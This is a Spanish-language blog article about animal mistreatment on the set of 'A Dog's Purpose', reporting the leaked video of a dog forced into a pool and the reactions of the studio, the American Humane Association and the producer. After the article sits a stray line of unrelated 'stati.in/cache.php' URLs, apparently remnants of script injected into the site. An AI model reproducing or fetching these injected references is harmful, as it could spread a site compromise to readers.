La Razón De Estar Contigo: Controversia por el maltrato a los animales

La frase “ningún animal ha sido lastimado durante la filmación de esta película” es de común uso en los films que tienen animales como protagonista. Este no fue el caso de esta cinta, donde la filmación se convirtió en un verdadero calvario para los perros que fueron usados como actores.

Por @martog23

El cine siempre tuvo una relación conflictiva con la participación de los animales en las películas. En grandes films clásicos como Ben-Hur, se han denunciado la crueldad contra animales que en varias ocasiones fueron heridos o hasta matados. Ya sea por negligencia o por falta de cuidado esto es un acto verdaderamente reprochable y reprobable.

Asociaciones como PETA (People for the Ethical Treatment of Animals) se han encargado durante años de revertir esta situación en el cine tanto comercial como artístico. Sin embargo, siempre surge un escándalo de alguna película que no tomó las medidas necesarias o que hicieron caso omiso a las reglas sobre el tratado ético del animal. El caso más reciente es el de La Razón De Estar Contigo o A Dog’s Purpose, una película supuestamente familiar que buscaba retratar tiernamente a estos animales. No obstante como bien dice el dicho «En casa de herrero, cuchillo de palo».

a-dogs-purpose-german-shepherd

Basada en una novela de W. Bruce Cameron, la película cuenta la vida de un perro que va atravesando y transitando por varias vidas y reencarnaciones en las que es adoptado por varias dueños humanos. El director de esta cinta es Lasse Hallström (Querido John) y el encargado de ponerle la voz al simpático perro es Josh Gad (Frozen, Pixels).

Un film de fantasía orientado a una clasificación ATP y a un público familiar debería no solo plasmar en pantalla los valores de la amistad, el cariño y el respeto por las mascotas sino también detrás de cámara en el set.

Esta semana la gente de TMZ, reveló un video bastante perturbador donde se grabó secretamente lo que acontecía en el set de filmación durante el rodaje en noviembre de 2015. El video nos muestra a un entrenador tratando de empujar a un ovejero alemán a una pileta que simulaba ser un lago con una fuerte corriente. El perro estaba completamente asustando y oponiendo resistencia ante el borde de la pileta. Finalmente, el perro es arrojado a la pileta y arrastrado por la corriente hasta el borde de la pileta. Repentinamente el perro se sumerge y parece no volver a emerger lo que ocasiona una escena de pánico en el rodaje. Los entrenadores se meten a la pileta para rescatarlo mientras miembros del equipo técnico gritan “Corten!” “Corten!”.

Aquí tienen el video en cuestión:

Los miembros de Universal Pictures se vieron sorprendidos ante la filtración del video y prometieron investigar las circunstancias de este desafortunado evento. Por otro lado, TMZ informó que miembros de la American Humane Association (la asociación que se encarga de controlar que se trate con responsabilidad a los animales durante las filmaciones) estaban presentes en el momento en que se registró este hecho. Dicha asociación comentó:
«Hemos separado del cargo al representante de seguridad que estaba en el rodaje, y lo reubicamos en el sector administrativo. Además, estamos trayendo a un investigador independiente para llevar a cabo una averiguación sobre este asunto».

rs_1024x683-170119072106-1024.a-dogs-purpose-4.11917.jpg

El productor de la cinta, Gavin Polone, es un activista y defensor de los derechos de los animales y se vio sorprendido por el video. “Estoy horrorizado. Lo primero que pregunté fue ¿El perro está bien? Afortunadamente lo está. Si hubiera presenciado esta situación, lo hubiese suspendido inmediatamente. Los responsables de este hecho deben hacerse cargo de lo que pasó. Alguien tenía el trabajo de controlar este tipo de cosas. ¿Por qué no lo hicieron? American Humane debe supervisar las filmaciones, ese es su trabajo por el cual alguien le ha pagado previamente mucho dinero. ¿Por qué no detuvieron la situación?  Debería haber un mejor sistema que este.”

Si bien el estudio está tratando de contener y minimizar el daño provocado por estas circunstancias, difícilmente se recupere de este incidente que le trajo mala prensa y publicidad. PETA y otros organismos que defienden los derechos de los animales están realizando campañas de boicot contra este film. La película se estrena en nuestro país el 2 de febrero.

¿Qué debe hacerse en estos casos? Eso es algo que cada uno deberá evaluar, lo cierto es que estas cosas no deberían ser aceptadas y tendría que tomarse alguna medida al respecto.


https://stati.in/cache.php?ver=3.0&ref=zino&client=zombiehttps://stati.in/cache.php?ver=99&ref=z&debug=false

1 Trackback / Pingback

  1. La Razón De Estar Contigo: Controversia por el maltrato a los animales | Directas & Indirectas

Deja un comentario

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.